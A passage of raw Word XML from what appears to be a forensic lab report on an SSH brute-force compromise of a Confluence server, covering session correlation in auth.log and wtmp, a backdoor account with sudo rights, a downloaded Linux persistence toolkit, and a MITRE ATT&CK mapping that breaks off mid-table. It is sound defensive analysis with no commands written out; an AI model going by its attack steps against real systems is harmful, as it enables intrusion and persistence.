          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cyberjunkie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and addition to sudo group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDF469D">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Session 37 closure timestamp: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>06:37:24 UTC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A65AB6">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo COMMAND log entry confirming download of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>linper.sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from GitHub via curl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED7EDC7">
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47E54063">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>These artifacts were analyzed using command-line log analysis tools and the provided utmp.py script. The exercise demonstrated the ability to extract attacker IP addresses, correlate session artifacts, identify persistence mechanisms, and map findings to the MITRE ATT&amp;CK framework using Unix log evidence alone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED6D9AF">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The structured documentation of each task, along with supporting screenshots (Figures 1–10), serves as verifiable evidence of the technical analysis process carried out throughout this investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366CB742">
      <w:pPr>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E96ABBB">
      <w:pPr>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="242993B8">
      <w:pPr>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C5CAC8C">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">VII.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>CHALLENGES AND SOLUTIONS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4112AA24">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0D7377" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FF46242">
      <w:pPr>
        <w:spacing w:before="100" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F4C2380">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Distinguishing Automated from Manual Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13089718">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The most analytically demanding challenge was distinguishing the automated brute force session (Session 34) from the manual interactive session (Session 37). Both sessions originated from the same IP and the same account. The key differentiator was the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>session duration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Session 34 opened and closed within the same second, which is characteristic of a brute force tool confirming credentials rather than a human operator. Cross-referencing with the wtmp artifact confirmed which session established an interactive terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0473F83B">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Correlating auth.log and wtmp Timestamps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164512FD">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The one-second difference between the auth.log password acceptance timestamp (06:32:44) and the wtmp session timestamp (06:32:45) required understanding of the sequence of events during SSH login: the password is accepted first, then the terminal session is established. Recognising this system processing sequence prevented misidentification of the login timestamp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F26C512">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Parsing the Binary wtmp Artefact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D924A3">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The wtmp file is a binary log that cannot be read directly with standard text utilities. Using the provided </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>utmp.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> parsing script to convert the binary format into human-readable output was necessary to extract the session timestamp. Additionally, the wtmp timestamp is displayed in local system time, requiring UTC conversion for accurate timeline reconstruction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B05DD4A">
      <w:pPr>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F298318">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">VIII.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>OUTCOMES AND IMPACT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273612CF">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0D7377" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F23FEDA">
      <w:pPr>
        <w:spacing w:before="100" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="642D9D8C">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">VIII.I  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>INCIDENT SUMMARY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB3EB92">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The investigation confirmed that a Confluence server was successfully compromised through an SSH brute force attack originating from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>65.2.161.68</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. The attacker obtained valid credentials for the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> account, established an interactive session at 06:32:45 UTC on 2024-03-06, created a backdoor account (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cyberjunkie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) with sudo privileges, and used that account to download the Linux persistence toolkit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>linper.sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from GitHub. The root session lasted approximately 4 minutes 39 seconds before being closed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558C3167">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">VIII.II  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK MAPPING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003AE549">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The table below maps each observed attacker action to the corresponding MITRE ATT&amp;CK tactic and technique, providing a standardised framework for detection rule development and threat intelligence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7853F234">
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="94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5450"/>
        <w:gridCol w:w="1400"/>
      </w:tblGrid>
      <w:tr w14:paraId="68700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B3A6B" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="1B3A6B" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="1B3A6B" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="1B3A6B" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1B3A6B"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3158B3F4">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5450" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1B3A6B" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="1B3A6B" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="1B3A6B" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="1B3A6B" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1B3A6B"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="099F3684">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1B3A6B" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="1B3A6B" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="1B3A6B" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="1B3A6B" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1B3A6B"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2A404698">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="39357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000A358F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="54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71E01A2A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3A3A3A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Active Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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1B5590A4">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D7377"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1595</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="00B1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7A1931C1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="545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680D2666">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3A3A3A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Brute Force: Password Guessing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="140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61A210DF">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D7377"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1110.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="73C79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592EC797">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="54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46E411FE">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3A3A3A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Command and Scripting Interpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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5509F728">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D7377"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1059</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5ACF9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06061F94">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="545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49A1A016">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3A3A3A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Create Account: Local Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="140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22B72D36">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D7377"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1136.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2BAD0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581A84C7">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="54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144189A4">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3A3A3A"/>
                <w:sz w:val="22"/>
